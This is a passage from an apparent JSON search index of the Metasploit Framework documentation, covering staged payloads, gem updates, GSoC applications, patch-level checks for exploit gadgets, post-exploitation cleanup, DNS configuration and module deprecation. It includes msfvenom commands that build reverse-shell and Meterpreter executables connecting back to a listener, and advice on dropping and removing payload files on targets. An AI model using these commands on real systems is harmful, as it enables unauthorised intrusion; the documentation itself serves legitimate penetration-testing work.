allocating a big chunk of memory for us to run in, stages can be arbitrarily large. One advantage of that is the ability to write final-stage payloads in a higher-level language like C. ",
    "url": "/docs/using-metasploit/basics/how-payloads-work.html#how-payloads-work",
    "relUrl": "/docs/using-metasploit/basics/how-payloads-work.html#how-payloads-work"
  },"201": {
    "doc": "How payloads work",
    "title": "Delivering stages",
    "content": ". | The IP address and port you want the payload to connect back to are embedded in the stager. As discussed above, all staged payloads are no more than a small stub that sets up communication and executes the next stage. When you create an executable using a staged payload, you’re really just creating the stager. So the following commands would create functionally identical exe files: msfvenom -f exe LHOST=192.168.1.1 -p windows/meterpreter/reverse_tcp msfvenom -f exe LHOST=192.168.1.1 -p windows/shell/reverse_tcp msfvenom -f exe LHOST=192.168.1.1 -p windows/vncinject/reverse_tcp . (Note that these are functionally identical – there is a lot of randomization that goes into it so no two executables are exactly the same.) . | The Ruby side acts as a client using whichever transport mechanism was set up by the stager (e.g.: tcp, http, https). | In the case of a shell stage, Metasploit will connect the remote process’s stdio to your terminal when you interact with it. | In the case of a Meterpreter stage, Metasploit will begin speaking the Meterpreter wire protocol. | . | . ",
    "url": "/docs/using-metasploit/basics/how-payloads-work.html#delivering-stages",
    "relUrl": "/docs/using-metasploit/basics/how-payloads-work.html#delivering-stages"
  },"202": {
    "doc": "How payloads work",
    "title": "How payloads work",
    "content": " ",
    "url": "/docs/using-metasploit/basics/how-payloads-work.html",
    "relUrl": "/docs/using-metasploit/basics/how-payloads-work.html"
  },"203": {
    "doc": "Adding and Updating",
    "title": "Adding and Updating",
    "content": "Update: We have automated this process (it runs every Thursday at noon US Central Time), and 99.9% of the time you will not need to follow any of the below steps. That said, if you need to update a gem in a PR, this is still a good procedure to follow. Sometimes you might want to pull in a new Ruby library or update an existing one to get more functionality. Metasploit leverages Bundler to manage Ruby gems and make dependencies easy. This document goes over the things you need to know when updating or adding gems to Metasploit. The Gemfile . Gems that are only sometimes used (say, only in test mode, or only when running with a database) are listed in a relevant Bundler group (test or db respectively) in the root Gemfile. The metasploit-framework.gemspec file . Gems that are always needed by Metasploit are kept in the metasploit-framework.gemspec file (this file is actually pulled into the Gemfile when calculating dependencies). The Lock File . The Gemfile.lock file holds the absolute versions of the Gems we want and keeps track of all the subdependencies. You should never need to manually edit this file: bundler will do it for you when you run bundle install after adding a gem. We keep this committed in the repo to ensure that all users are always on the same gem versions. Updating or adding a gem . If the gem is needed only for a specific Bundler group (like test or db), you should update the Gemfile: . | Add the Gem you want to the correct Group, or just update the version constraint. Check Bundler’s docs for the various ways to express version constraints: . gem 'my_favorite', '~&amp;gt; 1.0' . | Run bundle install | Commit any changes to the Gemfile.lock file | . If the gem is needed any time metasploit-framework is used, you should update the metasploit-framework.gemspec file: . | Add the gem as a runtime dependency, or just update the version constraint. Check Bundler’s docs for the various ways to express version constraints: . spec.add_runtime_dependency 'my_favorite_gem', '~&amp;gt; 3.0.1' . | Run bundle install | Commit any changes to the Gemfile.lock file. | . Gemfile.local . A Gemfile.local file is useful for adding temporary gems to the metasploit-framework, like pry-stack-explorer or other handy debugging libs; you don’t want to commit these gems into the repo, but might need them from time to time. To use a Gemfile.local file: . | Rename the Gemfile.local.example file in the repo root to Gemfile.local | Add the temporary gems you want to this file | Run bundle install | Make sure you do not commit the Gemfile.lock: git checkout -- Gemfile.lock | . ",
    "url": "/docs/development/maintainers/ruby-gems/how-to-add-and-update-gems-in-metasploit-framework.html",
    "relUrl": "/docs/development/maintainers/ruby-gems/how-to-add-and-update-gems-in-metasploit-framework.html"
  },"204": {
    "doc": "How to Apply to GSoC",
    "title": "2022 Timeline",
    "content": "An updated list of the application timeline can be found at https://developers.google.com/open-source/gsoc/timeline. Please refer to this link for any updates that Google may make, as they have been known to change the timeline for certain dates in the past. ",
    "url": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#2022-timeline",
    "relUrl": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#2022-timeline"
  },"205": {
    "doc": "How to Apply to GSoC",
    "title": "Important Dates",
    "content": ". | GSoC Applications Open: April 4th at 1800 UTC | GSoC Applications Close: April 19th at 1800 UTC for 2022 GSoC applications. No late submissions will be accepted, period. | Accepted applications announced: May 20th at 1800 UTC | Programming Starts: June 13th. | . ",
    "url": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#important-dates",
    "relUrl": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#important-dates"
  },"206": {
    "doc": "How to Apply to GSoC",
    "title": "Important Changes for 2022",
    "content": ". | All submissions (including both draft submissions and final submissions) must be in PDF format when being submitted to GSoC’s website. If you would like us to review your submission prior to the final deadline, please submit a Google Drive link to your DOC formatted proposal to msfdev [AT] metasploit [DOT] com and make sure that you have enabled commenting so that potential mentors can provide feedback. | . ",
    "url": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#important-changes-for-2022",
    "relUrl": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#important-changes-for-2022"
  },"207": {
    "doc": "How to Apply to GSoC",
    "title": "2022 Idea List",
    "content": "You can find the current list of GSoC ideas at GSoC-2022-Project-Ideas. Please see the note at the bottom of this page if you are interested in submitting your own idea, as this will require approval. ",
    "url": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#2022-idea-list",
    "relUrl": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#2022-idea-list"
  },"208": {
    "doc": "How to Apply to GSoC",
    "title": "Getting started",
    "content": "Students interesting in GSoC, can start by reading Google’s official guides. https://developers.google.com/open-source/gsoc/help/student-advice . Review all of the student guide and carefully read the proposal writing section. A listed idea is a seed for GSoC students to expand on and propose how to design and implement a solution. You can start by investigating the code base and how existing users interaction with msfconsole functionality. Think through scenarios on how a user might want to interact with the proposed idea. A place to get started with contributing to Metasploit is here and expanded on here. GSoC mentors tend to look for those items that have a chance of making development and usage easier or improving the overall performance of a certain area, however by starting with understanding the most common contribution pattern you can get familiar with the codebase and also the mindset of users. This will help you in creating a proposal with the end user in mind. Once you have started digging feel free ask questions that help you understand the concepts you for the idea would like to propose. Initial proposals can be sent for feedback before official submission opens to [email protected]. All proposals must be officially submitted during Student Application Period through the GSoC official site. At a bare minimum, proposals should include the following: . ",
    "url": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#getting-started",
    "relUrl": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#getting-started"
  },"209": {
    "doc": "How to Apply to GSoC",
    "title": "Title",
    "content": "A brief description of what you would like to work on. See GSoC-2022-Project-Ideas for ideas. ",
    "url": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#title",
    "relUrl": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#title"
  },"210": {
    "doc": "How to Apply to GSoC",
    "title": "Vitals",
    "content": ". | Your name | Contact info - include at least: . | an email address | github user name | Freenode nick/Slack nick | . | . ",
    "url": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#vitals",
    "relUrl": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#vitals"
  },"211": {
    "doc": "How to Apply to GSoC",
    "title": "Skillz",
    "content": "What programming languages are you familiar with, in order of proficiency? Most of Metasploit is written in Ruby; for any project you will most likely need at least a passing knowledge of it. If you want to work on Meterpreter or Mettle, C will be necessary as well. What other projects have you worked on before? . ",
    "url": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#skillz",
    "relUrl": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#skillz"
  },"212": {
    "doc": "How to Apply to GSoC",
    "title": "Your project",
    "content": "Fill in the details. What exactly do you want to accomplish? . ",
    "url": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#your-project",
    "relUrl": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#your-project"
  },"213": {
    "doc": "How to Apply to GSoC",
    "title": "Past Submissions",
    "content": "If you are interested in looking at past accepted submissions and projects, you can find them at https://summerofcode.withgoogle.com/archive, and clicking on any year from 2017 onwards (with the exception of 2019 as Metasploit did not participate this year). Then click on the Security tag, and search for Metasploit. Scroll down to the bottom and you will see past successful applications and the associated code for each successful submission. Submissions from 2020 onwards also include copies of the proposal that was sent in by the accepted contributor. ",
    "url": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#past-submissions",
    "relUrl": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html#past-submissions"
  },"214": {
    "doc": "How to Apply to GSoC",
    "title": "How to Apply to GSoC",
    "content": "Note: Final project proposals must be submitted through to Google through the GSoC Program Website, as stated in the rules. Before submitting to the GSoC website, it is also helpful to solicit proposal feedback. This can be done by reaching out to us on our Slack at https://metasploit.com/slack via the #gsoc channel, or via sending an email to msfdev [@] metasploit [dot] com. If you don’t hear back right away on a proposal, don’t give up! Contributors may be busy, or you may need to try again to get someone’s attention (but don’t spam). ",
    "url": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html",
    "relUrl": "/docs/development/google-summer-of-code/how-to-apply-to-gsoc.html"
  },"215": {
    "doc": "How to check Microsoft patch levels for your exploit",
    "title": "How to collect Microsoft patches",
    "content": "If you’re kind of hardcore with patch diffing, you probably maintain your own database of DLLs. But this may require a lot of disk space, for most people it’s probably not worth it unless you have to look at these DLLs pretty much everyday. A more economic way is probably have a way to track all these patches, and have some sort of interface to allow quick and easy access to them. Luckily, Microsoft maintains a list of all the patches in an Excel file that you can download here: . https://www.microsoft.com/en-us/download/confirmation.aspx?id=36982 . If you prefer some sort of GUI for searching, you can use Microsoft’s Security Update Guide. You can edit this dashboard to add specific filters, such as the Windows version, Internet Explorer version, Office, etc, etc. For example, if I want to find all the Internet Explorer 10 patches for Windows 7 since its debut, I can add the following filters: . | Windows 7 | Internet Explorer | . And then I sort by date from September 2012 to 2014, I get: 22 results. But of course, this number will go up because IE 10 is still supported. There are also other desktop or command-line tools that will basically check missing patches for your Windows system, such as Windows Update Powershell Module, in some cases this may work better. ",
    "url": "/docs/development/developing-modules/guides/how-to-check-microsoft-patch-levels-for-your-exploit.html#how-to-collect-microsoft-patches",
    "relUrl": "/docs/development/developing-modules/guides/how-to-check-microsoft-patch-levels-for-your-exploit.html#how-to-collect-microsoft-patches"
  },"216": {
    "doc": "How to check Microsoft patch levels for your exploit",
    "title": "Patch extraction",
    "content": ". | Old patches used to be packaged as EXEs, and this kind can be extracted by using decompression tools such as 7zip. Internet Explorer 6 patches, for example, can be extracted this way. | Newer patches packaged as EXEs support the /X flag for extraction. For example, the following will extract the patch under the same directory. Patches such as Internet Explorer 8 (for XP) can be extracted this way. | . Windows[Something]-KB[Something]-x86-ENU.exe /X:. | Most patches nowadays are packaged as MSUs. Here’s what you have to do: | . | Put all your *.msu files under the same directory (in Windows) | Run tools/exploit/extract_msu.bat [absolute directory path to *.msu files) | extract_msu.bat should automatically extract all the *.msu files. The “extracted” sub-directory in each new folder is where you can find the updated components. | . Note: The update folders might be labeled as GDR or QRE. GDR indicates Generation Distribution Release, while QRE means Quick Fix Engineering. ",
    "url": "/docs/development/developing-modules/guides/how-to-check-microsoft-patch-levels-for-your-exploit.html#patch-extraction",
    "relUrl": "/docs/development/developing-modules/guides/how-to-check-microsoft-patch-levels-for-your-exploit.html#patch-extraction"
  },"217": {
    "doc": "How to check Microsoft patch levels for your exploit",
    "title": "Checking gadgets in patches",
    "content": "The quickest way to check gadgets across different patches is by using Metasploit’s msfpescan utility (or msfbinscan, which is smart enough to know it’s PE format). It’s really easy, all you have to do is put the DLLs in the same directory, and then do: . $ ./msfbinscan -D -a [address] -A 10 /patches/*.dll . What that does is the tool will disassemble all the DLLs under that directory, at that specific address for 10 bytes. You can probably automate a little more to quickly identify which DLLs don’t have right gadget, and if that’s the case for you, that means the gadget you’re using is unsafe. You should find another one that’s more reliable. ",
    "url": "/docs/development/developing-modules/guides/how-to-check-microsoft-patch-levels-for-your-exploit.html#checking-gadgets-in-patches",
    "relUrl": "/docs/development/developing-modules/guides/how-to-check-microsoft-patch-levels-for-your-exploit.html#checking-gadgets-in-patches"
  },"218": {
    "doc": "How to check Microsoft patch levels for your exploit",
    "title": "How to check Microsoft patch levels for your exploit",
    "content": "Checking patch levels is an important task for vulnerability research or exploit development. As a bug-hunting kind of guy, you should care about patch levels because say you have an 0day for Internet Explorer 10, you can’t always assume it affects all IE 10 builds since its debut (2012). If you realize your 0day only affects one or two builds, how much of a threat is it? Probably not as bad as you think. If you’re an exploit developer, you’re checking patches for another reason: maximum reliability. There are a lot of ways your exploit can fail, a bad gadget due to a change by a system update is easily one of them. If this update occurred at a pretty early stage, chances are your exploit will fail a lot, too. ",
    "url": "/docs/development/developing-modules/guides/how-to-check-microsoft-patch-levels-for-your-exploit.html",
    "relUrl": "/docs/development/developing-modules/guides/how-to-check-microsoft-patch-levels-for-your-exploit.html"
  },"219": {
    "doc": "Cleanup",
    "title": "On this page",
    "content": ". | Cleanup method | FileDropper Mixin | . ",
    "url": "/docs/development/developing-modules/libraries/how-to-cleanup-after-module-execution.html#on-this-page",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-cleanup-after-module-execution.html#on-this-page"
  },"220": {
    "doc": "Cleanup",
    "title": "Cleanup method",
    "content": "Metasploit has a handy cleanup method that is always called when the module terminates, whether it is successful or not. This method can be overridden by any modules to add their own cleanup routines. For example, this might be useful to put some files back on the target after the module had deleted them. Another scenario would be to restore the settings in a web application that were modified by the exploit. This is the right place to clean things up. Framework itself implements this method to disconnect connections, call the handler cleanup routines, etc. Some other mixins, such as the Msf::Exploit::FileDropper (see the next section) or Msf::Exploit::Remote::Kerberos::Client, override this method to add their own cleanup code. It is extremely important to always call super in your cleanup method to make sure Framework and any other mixins clean up themself properly. Here is an example that restores a configuration file after being deleted by the module: . def cleanup unless self.conf_content.nil? write_file(self.conf_file, self.conf_content) end super end . Here is another example of a cleanup method that deletes a temporary Git repository: . def cleanup super return unless need_cleanup? print_status('Cleaning up') uri = normalize_uri(datastore['USERNAME'], self.repo_name, '/settings') csrf = get_csrf(uri) res = send_request_cgi({ 'method' =&amp;gt; 'POST', 'uri' =&amp;gt; normalize_uri(datastore['TARGETURI'], uri), 'ctype' =&amp;gt; 'application/x-www-form-urlencoded', 'vars_post' =&amp;gt; { _csrf: csrf, action: 'delete', repo_name: self.repo_name } }) unless res fail_with(Failure::Unreachable, 'Unable to reach the settings page') end unless res.code == 302 fail_with(Failure::UnexpectedReply, 'Delete repository failure') end print_status(\"Repository #{self.repo_name} deleted.\") nil end . ",
    "url": "/docs/development/developing-modules/libraries/how-to-cleanup-after-module-execution.html#cleanup-method",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-cleanup-after-module-execution.html#cleanup-method"
  },"221": {
    "doc": "Cleanup",
    "title": "FileDropper Mixin",
    "content": "In some exploitation scenarios such as local privilege escalation, command execution, write privilege attacks, SQL Injections, etc, it is very likely that you have to upload one or more malicious files in order to gain control of the target machine. Well, a smart attacker shouldn’t leave anything behind, so if a module needs to drop something onto the file system, it’s important to remove it right after the purpose is served. And that is why we created the FileDropper mixin. The FileDropper mixin is a file manager that allows you to keep track of files, and then delete them when a session is created. To use it, first include the mixin: . include Msf::Exploit::FileDropper . Next, tell the FileDropper mixin where the file is going to be after a session is created by using the register_file_for_cleanup method. Each file name should either be a full path or relative to the current working directory of the session. For example, if I want to upload a payload to the target machine’s remote path: C:\\Windows\\System32\\payload.exe, then my statement can be: . register_file_for_cleanup(\"C:\\\\Windows\\\\System32\\\\payload.exe\") . If my session’s current directory is already in C:\\Windows\\System32\\, then you can: . register_file_for_cleanup(\"payload.exe\") . If you wish to register multiple files, you can also provide the file names as arguments: . register_file_for_cleanup(\"file_1.vbs\", \"file_2.exe\", \"file_1.conf\") . Note that if your exploit module uses on_new_session, you are actually overriding FileDropper’s on_new_session. ",
    "url": "/docs/development/developing-modules/libraries/how-to-cleanup-after-module-execution.html#filedropper-mixin",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-cleanup-after-module-execution.html#filedropper-mixin"
  },"222": {
    "doc": "Cleanup",
    "title": "Cleanup",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/how-to-cleanup-after-module-execution.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-cleanup-after-module-execution.html"
  },"223": {
    "doc": "How to Configure DNS",
    "title": "Metasploit DNS",
    "content": " ",
    "url": "/docs/using-metasploit/advanced/how-to-configure-dns.html#metasploit-dns",
    "relUrl": "/docs/using-metasploit/advanced/how-to-configure-dns.html#metasploit-dns"
  },"224": {
    "doc": "How to Configure DNS",
    "title": "Background",
    "content": "Most applications that need to handle hostname to IP address lookups rely on the host operating system, either by passing the hostname directly to the socket-creation function or by calling a purpose built API such as getaddrinfo. This was also how Metasploit handled name lookups and would only directly communicate with a DNS server when the request was more involved than mapping a hostname to an IPv4 or IPv6 address. One flaw in this approach is that when pivoting connections over a session, the DNS lookups would occur through the host on which Metasploit was running instead of the compromised host from which the connection would originate. This lead to two issues, the first being the aforementioned DNS leaks and the second that Metasploit could not always resolve hostnames that the compromised system could. Starting in Metasploit 6.4, Metasploit uses an internal DNS resolution system that grants the user a high degree of control over the process of DNS queries. ",
    "url": "/docs/using-metasploit/advanced/how-to-configure-dns.html#background",
    "relUrl": "/docs/using-metasploit/advanced/how-to-configure-dns.html#background"
  },"225": {
    "doc": "How to Configure DNS",
    "title": "The DNS command",
    "content": "Metasploit’s DNS configuration is controlled by the dns command which has multiple subcommands. The current configuration can be printed by running dns print: . msf6 &amp;gt; dns print Default search domain: N/A Default search list: lab.lan Current cache size: 0 Resolver rule entries ===================== # Rule Resolver Comm channel - ---- -------- ------------ 1 * . \\_ static N/A . \\_ 127.0.0.53 Static hostnames ================ Hostname IPv4 Address IPv6 Address -------- ------------ ------------ localhost 127.0.0.1 ::1 \\_ 127.1.1.1 localhost.localdomain 127.0.0.1 ::1 localhost4 127.0.0.1 localhost4.localdomain4 127.0.0.1 localhost6 ::1 localhost6.localdomain6 ::1 . The help subcommand can be used to display the available subcommands. The name of a subcommand can also be specified as an argument to help to display additional information about that subcommand, for example dns help add. Metasploit’s DNS system is composed of the following major components: resolver rules, static entries and the cache. ",
    "url": "/docs/using-metasploit/advanced/how-to-configure-dns.html#the-dns-command",
    "relUrl": "/docs/using-metasploit/advanced/how-to-configure-dns.html#the-dns-command"
  },"226": {
    "doc": "How to Configure DNS",
    "title": "DNS Resolver Rules",
    "content": "DNS resolver rules are a single wildcard that is associated with zero or more resolver types. When a query name matches the wildcard expression, the associated resolvers are used in succession until one is capable of fulfilling the request. For example, a wildcard pattern of *.lab.lan would match www.lab.lan and _ldap._tcp.lab.lan, but not lab.lan or msflab.lan. Furthermore, the * wildcard pattern matches everything and should be used as a default rule. Once a rule that matches the query name is found, the specified resolvers will be tried in order until one is capable of handling the request. Different resolver types can be specified to handle queries in different ways. Rules are listed in numeric order starting at position 1. Rules can be added to or removed from specific positions in a similar manner to how iptables rules can be added to and removed from a specific chain. The Black Hole Resolver . The black hole resolver can be used to prevent queries from being resolved. It handles all query types and will prevent resolvers defined after it from being used. The black hole resolver is specified by using the black-hole keyword. The Upstream Resolver . An upstream resolver can be used by specifying either an IPv4 or IPv6 address. When Metasploit uses this resolver, the defined host will be contacted over the network. A session can optionally be defined through which network traffic will be sent. The System Resolver . The system resolver can be used for hostname resolution to either IPv4 or IPv6 addresses by invoking the host operating system’s API. This is particularly useful in cases where the system’s API is expected to be hooked by an external entity such as proxychains. The system resolver is specified by using the system keyword. Queries that can not be fulfilled by simply translating the query name to an IP address (e.g. PTR, TXT and SRV queries) will use the next resolver that is configured in the rule. The Static Resolver . The static resolver can be used for hostname resolution to either IPv4 or IPv6 addresses through a static mapping that is configured within Metasploit. This functionality is analogous to the hosts file found on many systems which defines static hostname to IP address associations. The static resolver is specified by using the static keyword. Queries that can not be fulfilled by simply translating the query name to an IP address (e.g. PTR, TXT and SRV queries) will use the next resolver that is configured in the rule. See Static DNS Entries for configuring static entries. Example Rules . Define a single rule in the first position to handle all queries through three resolvers, first checking if there is a static entry in Metasploit then using the system resolver and finally specifying an upstream DNS server to handle any other query type. dns add --index 1 --rule * static system 192.0.2.1 . Append a rule to the end that will handle all queries for *.lab.lan using an upstream server contacted through session 1. dns add --rule *.lab.lan --session 1 192.0.2.1 . Append a rule to drop all queries for *.noresolve.lan using the black hole resolver. dns add --rule *.noresolve.lan black-hole . ",
    "url": "/docs/using-metasploit/advanced/how-to-configure-dns.html#dns-resolver-rules",
    "relUrl": "/docs/using-metasploit/advanced/how-to-configure-dns.html#dns-resolver-rules"
  },"227": {
    "doc": "How to Configure DNS",
    "title": "Static DNS Entries",
    "content": "Static entries used by the static resolver are configured through the add-static and remove-static subcommands. The currently configured entries can be viewed in the dns print output and all entries can be flushed with the flush-static subcommand. Static entries that are configured are shared across all rules in which a static resolver is specified. In order for the static entry to be used, at least one rule must match the hostname, and that rule must be configured to use the static resolver. A single hostname can be associated with multiple IP addresses and the same IP address can be associated with multiple hostnames. Example Static Entries . Define static entries for localhost and common variations. dns add-static localhost 127.0.0.1 ::1 dns add-static localhost4 127.0.0.1 dns add-static localhost6 ::1 . Remove all static entries for localhost. dns remove-static localhost . Remove all static entries. dns flush-static . ",
    "url": "/docs/using-metasploit/advanced/how-to-configure-dns.html#static-dns-entries",
    "relUrl": "/docs/using-metasploit/advanced/how-to-configure-dns.html#static-dns-entries"
  },"228": {
    "doc": "How to Configure DNS",
    "title": "The DNS Cache",
    "content": "DNS query replies are cached internally by Metasploit based on their TTL. This intends to minimize the amount of network traffic required to perform the necessary lookups. The number of query replies that are currently cached is available in the dns print output and all replies can be flushed with the flush-cache subcommand. ",
    "url": "/docs/using-metasploit/advanced/how-to-configure-dns.html#the-dns-cache",
    "relUrl": "/docs/using-metasploit/advanced/how-to-configure-dns.html#the-dns-cache"
  },"229": {
    "doc": "How to Configure DNS",
    "title": "Configuration Management",
    "content": "The DNS configuration can be saved using the save command from the msfconsole command context. Once saved, the settings will be automatically restored the next time Metasploit starts up. Any changes that are made at runtime will be lost when Metasploit exits, unless the save command is used. Resetting the Configuration . The DNS configuration can be restored to the default state by using the reset-config subcommand. The default configuration: . | Populates the static entries from the host operating system’s hosts file | Defines a single rule that matches all query names whose first resolver is the static resolver and the remaining resolvers are set from the host operating systems’ resolv.conf file | . ",
    "url": "/docs/using-metasploit/advanced/how-to-configure-dns.html#configuration-management",
    "relUrl": "/docs/using-metasploit/advanced/how-to-configure-dns.html#configuration-management"
  },"230": {
    "doc": "How to Configure DNS",
    "title": "Resolving hostnames",
    "content": "The resolve subcommand can be used to resolve a hostname to either an IPv4 or IPv6 address. In doing so, the rule that was used to define the resolvers will be printed allowing the wildcard matching logic to be tested. ",
    "url": "/docs/using-metasploit/advanced/how-to-configure-dns.html#resolving-hostnames",
    "relUrl": "/docs/using-metasploit/advanced/how-to-configure-dns.html#resolving-hostnames"
  },"231": {
    "doc": "How to Configure DNS",
    "title": "How to Configure DNS",
    "content": " ",
    "url": "/docs/using-metasploit/advanced/how-to-configure-dns.html",
    "relUrl": "/docs/using-metasploit/advanced/how-to-configure-dns.html"
  },"232": {
    "doc": "Base64 Support",
    "title": "Description",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-decode-base64-with-metasploit-framework-compiler.html#description",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-decode-base64-with-metasploit-framework-compiler.html#description"
  },"233": {
    "doc": "Base64 Support",
    "title": "How to decode Base64 with Metasploit::Framework::Compiler",
    "content": "The Metasploit C compiler has built-in support for Base64 encoding and decoding, which is implemented as base64.h. ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-decode-base64-with-metasploit-framework-compiler.html#how-to-decode-base64-with-metasploitframeworkcompiler",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-decode-base64-with-metasploit-framework-compiler.html#how-to-decode-base64-with-metasploitframeworkcompiler"
  },"234": {
    "doc": "Base64 Support",
    "title": "Code Example",
    "content": "#include &amp;lt;Windows.h&amp;gt; #include &amp;lt;String.h&amp;gt; #include &amp;lt;base64.h&amp;gt; // \"Hello World\" encoded by Rex::Text.encode_base64() #define BASE64STR \"aGVsbG8gd29ybGQ=\" int main() { int base64StrLen = strlen(BASE64STR); LPVOID lpBuf = VirtualAlloc(NULL, sizeof(int) * base64StrLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memset(lpBuf, '\\0', base64StrLen); base64decode(lpBuf, BASE64STR, base64StrLen); MessageBox(NULL, (char*) lpBuf, \"Base64 Test\", MB_OK); return 0; } . To compile, use How to use Metasploit::Framework::Compiler::Windows to compile C code . ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-decode-base64-with-metasploit-framework-compiler.html#code-example",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-decode-base64-with-metasploit-framework-compiler.html#code-example"
  },"235": {
    "doc": "Base64 Support",
    "title": "Base64 Support",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-decode-base64-with-metasploit-framework-compiler.html",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-decode-base64-with-metasploit-framework-compiler.html"
  },"236": {
    "doc": "RC4 Support",
    "title": "How to decrypt RC4 with Metasploit::Framework::Compiler",
    "content": "The Metasploit C compiler has built-in support for RC4 encryption and decryption, which is implemented as the rc4.h header. ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-decrypt-rc4-with-metasploit-framework-compiler.html#how-to-decrypt-rc4-with-metasploitframeworkcompiler",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-decrypt-rc4-with-metasploit-framework-compiler.html#how-to-decrypt-rc4-with-metasploitframeworkcompiler"
  },"237": {
    "doc": "RC4 Support",
    "title": "Code Example",
    "content": "#include &amp;lt;Windows.h&amp;gt; #include &amp;lt;rc4.h&amp;gt; #define PAYLOADSIZE 12 #define RC4KEY \"4ASMkFslyhwXehNZw048cF1Vh1ACzyyA\" int main(void) { unsigned char payload[] = \"\\xd8\\xb0\\xe9\\x5a\\x89\\xc2\\xee\\x43\\xb9\\x30\\xd0\\x86\"; int lpBufSize = sizeof(int) * PAYLOADSIZE; LPVOID lpBuf = VirtualAlloc(NULL, lpBufSize, MEM_COMMIT, 0x04); memset(lpBuf, '\\0', lpBufSize); RC4(RC4KEY, payload, (char*) lpBuf, PAYLOADSIZE); MessageBox(NULL, (char*) lpBuf, \"Test\", MB_OK); return 0; } . To compile, use Metasploit::Framework::Compiler::Windows.compile_c. ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-decrypt-rc4-with-metasploit-framework-compiler.html#code-example",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-decrypt-rc4-with-metasploit-framework-compiler.html#code-example"
  },"238": {
    "doc": "RC4 Support",
    "title": "RC4 Support",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-decrypt-rc4-with-metasploit-framework-compiler.html",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-decrypt-rc4-with-metasploit-framework-compiler.html"
  },"239": {
    "doc": "How to deprecate a Metasploit module",
    "title": "Usage",
    "content": "To use the Msf::Module::Deprecated, here’s how: . 1 - Under class MetasploitModule of your module, include the following: . include Msf::Module::Deprecated . 2a - When moving a module, use the moved_from method in the new module to add an alias to the old module name: . moved_from 'auxiliary/analyze/jtr_windows_fast' . 2b - Use the deprecated method to assign a deprecation date and replacement module: . deprecated(Date.new(2014, 9, 21), 'exploit/linux/http/dlink_upnp_exec_noauth') . 2c - Alternatively, define the DEPRECATION_DATE and DEPRECATION_REPLACEMENT constants: . DEPRECATION_DATE = Date.new(2014, 9, 21) # Sep 21 # The new module is exploit/linux/http/dlink_upnp_exec_noauth DEPRECATION_REPLACEMENT = 'exploit/linux/http/dlink_upnp_exec_noauth' . When the user loads that module, they should see a warning like this: . msf &amp;gt; use exploit/windows/misc/test [!] ************************************************************************ [!] * The module windows/misc/test is deprecated! * [!] * It will be removed on or about 2014-09-21 * [!] * Use exploit/linux/http/dlink_upnp_exec_noauth instead * [!] ************************************************************************ . ",
    "url": "/docs/development/maintainers/process/how-to-deprecate-a-metasploit-module.html#usage",
    "relUrl": "/docs/development/maintainers/process/how-to-deprecate-a-metasploit-module.html#usage"
  },"240": {
    "doc": "How to deprecate a Metasploit module",
    "title": "Code example",
    "content": "class MetasploitModule &amp;lt; Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Module::Deprecated deprecated(Date.new(2014, 9, 21), 'exploit/linux/http/dlink_upnp_exec_noauth') def initialize(info = {}) super( update_info( info, 'Name' =&amp;gt; 'Msf::Module::Deprecated Example', 'Description' =&amp;gt; %q{ This shows how to use Msf::Module::Deprecated. }, 'Author' =&amp;gt; [ 'sinn3r' ], 'License' =&amp;gt; MSF_LICENSE, 'References' =&amp;gt; [ [ 'URL', 'http://metasploit.com' ] ], 'DisclosureDate' =&amp;gt; '2014-04-01', 'Targets' =&amp;gt; [ [ 'Automatic', {} ] ], 'DefaultTarget' =&amp;gt; 0 ) ) end def exploit print_debug('Code example') end end . ",
    "url": "/docs/development/maintainers/process/how-to-deprecate-a-metasploit-module.html#code-example",
    "relUrl": "/docs/development/maintainers/process/how-to-deprecate-a-metasploit-module.html#code-example"
  },"241": {
    "doc": "How to deprecate a Metasploit module",
    "title": "How to deprecate a Metasploit module",
    "content": "Metasploit has a very specific way to deprecate a module. To do so, you must be using the Msf::Module::Deprecated mixin. The reason you must be using this mixin is because two things: . | You are required to set a deprecation date. That way we know when to remove it, which is done manually. | You are optionally allowed to set a replacement of the module you wish to deprecate. | . ",
    "url": "/docs/development/maintainers/process/how-to-deprecate-a-metasploit-module.html",
    "relUrl": "/docs/development/maintainers/process/how-to-deprecate-a-metasploit-module.html"
  },"242": {
    "doc": "Reporting and Storing Data",
